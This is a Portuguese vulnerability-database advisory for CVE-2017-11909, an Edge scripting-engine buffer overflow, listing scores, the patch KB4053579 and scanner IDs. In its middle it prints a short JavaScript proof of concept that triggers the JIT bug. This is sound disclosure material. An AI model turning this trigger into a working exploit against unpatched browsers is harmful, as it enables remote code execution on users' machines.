Microsoft Edge Scripting Engine RemoveEmptyLoopAfterMemOp Excesso de tampão
| CVSS Meta Pontuação Temporária | Preço atual do exploit (≈) | Nota de Interesse CTI |
|---|---|---|
| 5.8 | $0-$5k | 0.00 |
Sumário
Uma vulnerabilidade, que foi classificada como crítico, foi encontrada em Microsoft Edge. O elemento afetado é a função BackwardPass::RemoveEmptyLoopAfterMemOp no componente Scripting Engine. A utilização pode causar Excesso de tampão.
Esta vulnerabilidade é identificada como CVE-2017-11909. Existe a possibilidade de executar o ataque de forma remota. Além disso, um exploit está disponível.
Recomenda-se instalar um patch para corrigir esta vulnerabilidade.
Detalhes
Uma vulnerabilidade, que foi classificada como crítico, foi encontrada em Microsoft Edge. O elemento afetado é a função BackwardPass::RemoveEmptyLoopAfterMemOp no componente Scripting Engine. A utilização pode causar Excesso de tampão. Ao utilizar CWE para declarar o problema, isso direciona para CWE-119. O problema foi detectado em 12/12/2017. A falha foi publicada 12/12/2017 por lokihardt com Google Project Zero como KB4053579 como Security Update Guide (Site). O comunicado foi disponibilizado para download em portal.msrc.microsoft.com.
Esta vulnerabilidade é identificada como CVE-2017-11909. A atribuição do identificador CVE aconteceu em 31/07/2017. Existe a possibilidade de executar o ataque de forma remota. Há detalhes técnicos disponíveis. Esta vulnerabilidade apresenta popularidade inferior à média. Além disso, um exploit está disponível. O exploit foi exposto ao público e pode ser aproveitado. No momento, o preço atual de um exploit pode estar em torno de USD $0-$5k atualmente. O boletim informa:
A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Microsoft Edge. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.
Foi declarado como prova de conceito. É possível descarregar a exploração em exploit-db.com. Como 0-day, o preço estimado no mercado clandestino era em torno de $25k-$100k. Segue o código empregado pelo exploit:
function opt(a, b, always_true = true) {
a[0] = 1234;
b[0] = 0;
let arr = a;
if (always_true) {
arr = b;
for (let i = 0; i < arr.length; i++)
arr[i] = 0;
}
let val = arr[0];
if (val) {
print(val); // Must be 0, but prints out 1234
return true;
}
return false;
}
let a = new Uint32Array(1);
let b = new Uint32Array(0x1000);
for (let i = 0; i < 10000; i++) {
if (opt(a, b)) {
break;
}
} O scanner de vulnerabilidades Nessus fornece um plugin com o ID 105180. Pertence à família Windows : Microsoft Bulletins. O plugin opera no contexto do tipo l. O scanner de vulnerabilidade comercial Qualys é capaz de testar este problema com plugin 91416 (Microsoft Edge Security Update for December 2017).
O patch chama-se KB4053579. O patch pode ser baixado em catalog.update.microsoft.com. Recomenda-se instalar um patch para corrigir esta vulnerabilidade.
Outros bancos de dados de vulnerabilidades também documentam esta vulnerabilidade: SecurityFocus (BID 102085) e Tenable (105180).
Produto
Tipo
Fabricante
Nome
Licença
Site
- Fabricante: https://www.microsoft.com/
CPE 2.3
CPE 2.2
CVSSv4
VulDB Vetor: 🔍VulDB Fiabilidade: 🔍
CVSSv3
VulDB Meta Pontuação Base: 6.0VulDB Meta Pontuação Temporária: 5.8
VulDB Pontuação Base: 6.3
VulDB Pontuação Temporária: 5.7
VulDB Vetor: 🔍
VulDB Fiabilidade: 🔍
Fabricante Pontuação Base (Microsoft): 4.2
Fabricante Vector (Microsoft): 🔍
NVD Pontuação Base: 7.5
NVD Vetor: 🔍
CVSSv2
| AV | AC | Au | C | I | A |
|---|---|---|---|---|---|
| 💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
| 💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
| 💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
| Vector | Complexidade | Autenticação | Confidencialidade | Integridade | Disponibilidade |
|---|---|---|---|---|---|
| Desbloquear | Desbloquear | Desbloquear | Desbloquear | Desbloquear | Desbloquear |
| Desbloquear | Desbloquear | Desbloquear | Desbloquear | Desbloquear | Desbloquear |
| Desbloquear | Desbloquear | Desbloquear | Desbloquear | Desbloquear | Desbloquear |
VulDB Pontuação Base: 🔍
VulDB Pontuação Temporária: 🔍
VulDB Fiabilidade: 🔍
NVD Pontuação Base: 🔍
Exploração
Classe: Excesso de tampãoCWE: CWE-119
CAPEC: 🔍
ATT&CK: 🔍
Físico: Não
Local: Não
Remoto: Sim
Disponibilidade: 🔍
Acesso: Público
Estado: Prova de conceito
Autor: Google Security Research
Descarregar: 🔍
EPSS Score: 🔍
EPSS Percentile: 🔍
Tendência de preços: 🔍
Estimativa de preço atual: 🔍
| 0-Day | Desbloquear | Desbloquear | Desbloquear | Desbloquear |
|---|---|---|---|---|
| Hoje | Desbloquear | Desbloquear | Desbloquear | Desbloquear |
Nessus ID: 105180
Nessus Nome: KB4053579: Windows 10 Version 1607 and Windows Server 2016 December 2017 Security Update
Nessus Ficheiro: 🔍
Nessus Risco: 🔍
Nessus Família: 🔍
Nessus Context: 🔍
OpenVAS ID: 56516
OpenVAS Nome: Microsoft Windows Multiple Vulnerabilities (KB4054517)
OpenVAS Ficheiro: 🔍
OpenVAS Família: 🔍
Qualys ID: 🔍
Qualys Nome: 🔍
Exploit-DB: 🔍
Inteligência de ameaças
Interesse: 🔍Atores ativos: 🔍
Grupos APT ativos: 🔍
Contramedidas
Recomendação: PatchEstado: 🔍
Tempo de resposta: 🔍
Tempo 0-dia: 🔍
Tempo de exposição: 🔍
Tempo de atraso de exploração: 🔍
Patch: KB4053579
Linha do tempo
31/07/2017 🔍12/12/2017 🔍
12/12/2017 🔍
12/12/2017 🔍
12/12/2017 🔍
12/12/2017 🔍
12/12/2017 🔍
13/12/2017 🔍
09/01/2018 🔍
09/01/2018 🔍
14/06/2024 🔍
Fontes
Fabricante: microsoft.comAconselhamento: KB4053579
Pessoa: lokihardt
Empresa: Google Project Zero
Estado: Confirmado
Confirmação: 🔍
CVE: CVE-2017-11909 (🔍)
GCVE (CVE): GCVE-0-2017-11909
GCVE (VulDB): GCVE-100-110538
OVAL: 🔍
SecurityFocus: 102085 - Microsoft Edge Scripting Engine CVE-2017-11909 Remote Memory Corruption Vulnerability
SecurityTracker: 1039990
scip Labs: https://www.scip.ch/en/?labs.20161013
Veja também: 🔍
Entrada
Criado: 13/12/2017 07h54Atualizado: 14/06/2024 21h49
Ajustamentos: 13/12/2017 07h54 (98), 24/12/2019 15h07 (7), 27/01/2021 07h16 (2), 14/06/2024 21h49 (16)
Completo: 🔍
Cache ID: 216::103
If you want to get best quality of vulnerability data, you may have to visit VulDB.
Ainda sem comentários. Idiomas: pt + es + en.
Por favor, inicie sessão para comentar.